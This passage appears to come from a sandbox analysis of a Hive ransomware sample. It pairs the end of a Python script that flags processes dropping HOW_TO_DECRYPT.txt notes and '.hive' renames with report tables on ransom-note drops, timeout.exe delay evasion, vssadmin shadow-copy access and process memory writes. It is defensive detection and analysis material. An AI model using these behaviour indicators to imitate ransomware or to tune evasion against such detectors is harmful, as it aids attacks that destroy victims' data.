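File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Solutions\gradient.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
"""

# Description values that appear in this report's tables (longest first so a
# prefix match cannot pick the shorter one by mistake).
DESCRIPTIONS = ("File opened for modification", "File created")
RANSOM_NOTE = "HOW_TO_DECRYPT.txt"
# Renamed-file shape seen on this page: "<original name>.<43 base64url chars>.hive".
# 43 unpadded base64url characters is exactly the encoding of 32 bytes.
HIVE_SUFFIX = re.compile(r"\.([A-Za-z0-9_-]{43})\.hive$")


def parse_row(row):
    """Split one flattened row into (description, indicator, process, target).

    Indicator paths contain spaces ("Program Files (x86)"), so the split is
    anchored on the known description text, the single-token target column,
    and the last " C:\\" in the row, which is assumed to start the process path.
    """
    desc = next((d for d in DESCRIPTIONS if row.startswith(d + " ")), None)
    if desc is None:
        raise ValueError(f"unknown description in row: {row!r}")
    rest, target = row[len(desc) + 1:].rsplit(" ", 1)
    parts = rest.rsplit(" C:\\", 1)
    if len(parts) != 2:
        raise ValueError(f"no process path found in row: {row!r}")
    return desc, parts[0], "C:\\" + parts[1], target


def summarize(rows):
    """Per-process counts of ransom-note directories, .hive renames and other
    writes, plus the shared prefix of the 43-character tokens in renamed files."""
    stats = defaultdict(lambda: {"note_dirs": set(), "encrypted": 0,
                                 "other": 0, "tokens": set()})
    for line in rows.strip().splitlines():
        desc, indicator, process, _ = parse_row(line)
        directory, name = indicator.rsplit("\\", 1)
        s = stats[process]
        m = HIVE_SUFFIX.search(name)
        if desc == "File created" and name == RANSOM_NOTE:
            s["note_dirs"].add(directory)
        elif m:
            s["encrypted"] += 1
            s["tokens"].add(m.group(1))
        else:
            s["other"] += 1
    return {
        p: {
            "note_dirs": len(s["note_dirs"]),
            "encrypted": s["encrypted"],
            "other": s["other"],
            "token_lengths": {len(t) for t in s["tokens"]},
            # Characters identical across every token seen for this process.
            "token_prefix": os.path.commonprefix(sorted(s["tokens"])),
        }
        for p, s in stats.items()
    }


def classify(summary, min_note_dirs=3, min_encrypted=1):
    """Flag a process as ransomware-like when it drops the same note into several
    directories AND writes files carrying the appended .hive token. Thresholds
    are illustrative; on a real endpoint feed the full event stream, not 8 rows."""
    return {
        p: s["note_dirs"] >= min_note_dirs and s["encrypted"] >= min_encrypted
        for p, s in summary.items()
    }


if __name__ == "__main__":
    summary = summarize(SAMPLE_ROWS)
    for proc, s in summary.items():
        print(proc)
        print(f"  ransom note dirs   : {s['note_dirs']}")
        print(f"  .hive renames      : {s['encrypted']} (token lengths {s['token_lengths']})")
        print(f"  shared token prefix: {s['token_prefix']!r}")
        print(f"  ransomware-like    : {classify(summary)[proc]}")
```

Run as-is and it reports the single process from this report with 3 note directories, 3 .hive renames, 2 other writes and the shared 21-character token prefix. The same parser works on the full tables above if they are pasted into SAMPLE_ROWS; the note count then climbs into the hundreds, which is the property a host-based rule should key on, since a single HOW_TO_DECRYPT.txt or one oddly named file is noise but the same note landing in System32, Program Files and the user profile within seconds from one process is not.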

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Branding\Basebrd\ja-JP\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\assembly\GAC_MSIL\MiguiControls\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Dynamic\770a605d5193c730225204fa780278ae\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\amd64_server-help-chm.mmc.resources_31bf3856ad364e35_6.1.7600.16385_de-de_6fe1f4a7f8512ee9\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-dskquota.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_a35ddd3ab3e846e1\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-feedback-service_31bf3856ad364e35_6.1.7600.16385_none_d5c0e508aa96a650\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-help-netvsta.resources_31bf3856ad364e35_6.1.7600.16385_it-it_8e2308b4c72ddb0e\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-btpanui-mui.resources_31bf3856ad364e35_6.1.7600.16385_it-it_742ca32d0094a20a\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\amd64_prnhp005.inf.resources_31bf3856ad364e35_6.1.7600.16385_en-us_89c102ed2ea8f023\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-d..utoenroll.resources_31bf3856ad364e35_6.1.7600.16385_it-it_47b8ac96851475dc\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-scripting.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_2d85ca15abc04414\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\amd64_netnvma.inf.resources_31bf3856ad364e35_6.1.7600.16385_it-it_5cd47ea41c470020\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-servicereportingapi_31bf3856ad364e35_6.1.7600.16385_none_6c7678cbda7098f8\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-i..l-keyboard-0000042c_31bf3856ad364e35_6.1.7600.16385_none_59634f5e6fa7d5d1\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-ie-feedsbs.resources_31bf3856ad364e35_8.0.7600.16385_ja-jp_edf96fb1262f5b5c\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\amd64_netfx35linq-system....dynamicdata.design_31bf3856ad364e35_6.1.7601.17514_none_f48e45c7055224f8\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\inf\.NET CLR Networking 4.0.0.0\000D\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\msil_microsoft.iis.power...provider.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_8f36c53b01dec296\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-mfdvdec_31bf3856ad364e35_6.1.7600.16385_none_64a6ece3617cfb74\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-r..lperclass.resources_31bf3856ad364e35_6.1.7600.16385_it-it_56ef5165204df522\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\msil_msbuild.resources_b03f5f7f11d50a3a_3.5.7600.16385_ja-jp_586fdad8bd134e99\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\x86_netfx-sbs_sys_data_dll_31bf3856ad364e35_6.1.7600.16385_none_fe6017304e1a4816\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\assembly\GAC_MSIL\System.XML.resources\2.0.0.0_es_b77a5c561934e089\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-ndisuio.resources_31bf3856ad364e35_6.1.7600.16385_es-es_f8133cc8594b3790\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\amd64_wcf-m_smsvchost_perf_c_ini_31bf3856ad364e35_6.1.7600.16385_none_902b82bc25e07ac6\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\msil_microsoft.grouppolicy.reporting_31bf3856ad364e35_6.1.7601.17514_none_4c14798809666596\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-blb-cli-main_31bf3856ad364e35_6.1.7600.16385_none_a749cec7a8b6bf08\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-help-mail.resources_31bf3856ad364e35_6.1.7600.16385_de-de_00ed58017fd687e8\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-shunimpl_31bf3856ad364e35_6.1.7601.17514_none_b3bc7baa4af52181\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-audio-mci_31bf3856ad364e35_6.1.7600.16385_none_1ce3af494d8b953d\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-ldap-client.resources_31bf3856ad364e35_6.1.7600.16385_de-de_32516987997ca2b8\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-ieframe.resources_31bf3856ad364e35_8.0.7600.16385_es-es_0640ddf35e8847b1\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-l..epremiumn.resources_31bf3856ad364e35_6.1.7601.17514_fr-fr_bc8aa7bd88265509\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-netplwiz.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_2dd66c79c7e4f8e2\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\msil_system.data.oracleclient.resources_b77a5c561934e089_6.1.7600.16385_it-it_e8dad23a13148696\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-m..fications.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_8b669fa14daef0eb\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-class_ss.resources_31bf3856ad364e35_6.1.7600.16385_en-us_9c43114bf49ad2c9\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-i..l-keyboard-0001040e_31bf3856ad364e35_6.1.7600.16385_none_fd64cf5361a6c8d6\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-s..ty-syskey.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_47ae60c666d2a843\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-i..tional-codepage-864_31bf3856ad364e35_6.1.7600.16385_none_cebf380cfc84b5bf\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-b..trics-cpl.resources_31bf3856ad364e35_6.1.7600.16385_it-it_296d0df052df9526\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-http-api.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_53ea200d3ef98f2e\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-powercfg.resources_31bf3856ad364e35_6.1.7600.16385_en-us_84ef507e8404018b\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-i..onal-codepage-28592_31bf3856ad364e35_6.1.7600.16385_none_b188802cfdb67997\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-previousversions-adm_31bf3856ad364e35_6.1.7600.16385_none_41d785d4f443b620\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-ie-behaviors.resources_31bf3856ad364e35_8.0.7600.16385_de-de_9916db26952fe7f2\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-i..ltinstall.resources_31bf3856ad364e35_6.1.7600.16385_de-de_07c23c1fe40f7920\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\amd64_security-malware-wi..er-events.resources_31bf3856ad364e35_6.1.7600.16385_en-us_dab3100a21f7543b\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-wininit.resources_31bf3856ad364e35_6.1.7600.16385_de-de_9c4b10f07cfccf53\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-wlanui.resources_31bf3856ad364e35_6.1.7600.16385_es-es_269cc1254400eed5\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\Microsoft.NET\assembly\GAC_MSIL\netstandard\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-c..r-name-ui.resources_31bf3856ad364e35_6.1.7600.16385_it-it_a2020e67811e5799\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-h..-iisbasic.resources_31bf3856ad364e35_6.1.7600.16385_de-de_230604a78e189958\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-mobsync.resources_31bf3856ad364e35_6.1.7600.16385_es-es_d761dac9339ff88c\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\amd64_prnrc004.inf_31bf3856ad364e35_6.1.7600.16385_none_21e7809d8e910def\Amd64\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\wow64_microsoft-windows-scripting-jscript_31bf3856ad364e35_11.2.9600.16428_none_6f8ba5f740934aae\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-i..tbranding.resources_31bf3856ad364e35_8.0.7600.16385_ja-jp_3f9f9ef99cdb9cde\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-directx-direct3d11_31bf3856ad364e35_7.1.7601.16492_none_3ef665796f74e084\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-netprofui.resources_31bf3856ad364e35_6.1.7600.16385_it-it_3cfdaed76b6ce5f9\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-tasklist.resources_31bf3856ad364e35_6.1.7600.16385_es-es_1c4d3cb94d962c50\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-h..centercpl.resources_31bf3856ad364e35_6.1.7600.16385_de-de_fdec13235c1fa8e5\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-o..s-service.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_56fb8cc6dcb2acfb\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-a..apc-layer.resources_31bf3856ad364e35_6.1.7600.16385_en-us_c5ccee6ea35066e8\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3020 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe C:\Windows\system32\cmd.exe
PID 3020 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe C:\Windows\system32\cmd.exe
PID 3020 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe C:\Windows\system32\cmd.exe
PID 3020 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe C:\Windows\system32\cmd.exe
PID 3020 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe C:\Windows\system32\cmd.exe
PID 3020 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe C:\Windows\system32\cmd.exe
PID 2568 wrote to memory of 2864 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 2864 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 2864 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2248 wrote to memory of 2868 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2248 wrote to memory of 2868 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2248 wrote to memory of 2868 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2568 wrote to memory of 2128 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 2128 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 2128 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 1656 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 1656 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 1656 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 1996 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 1996 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 1996 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 2332 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 2332 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 2332 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 2008 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 2008 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 2008 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 112 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 112 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 112 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 2240 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 2240 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 2240 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 324 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 324 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 324 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 1728 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 1728 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 1728 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 1788 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 1788 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 1788 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 2828 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 2828 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 2828 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 2620 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 2620 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2568 wrote to memory of 2620 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
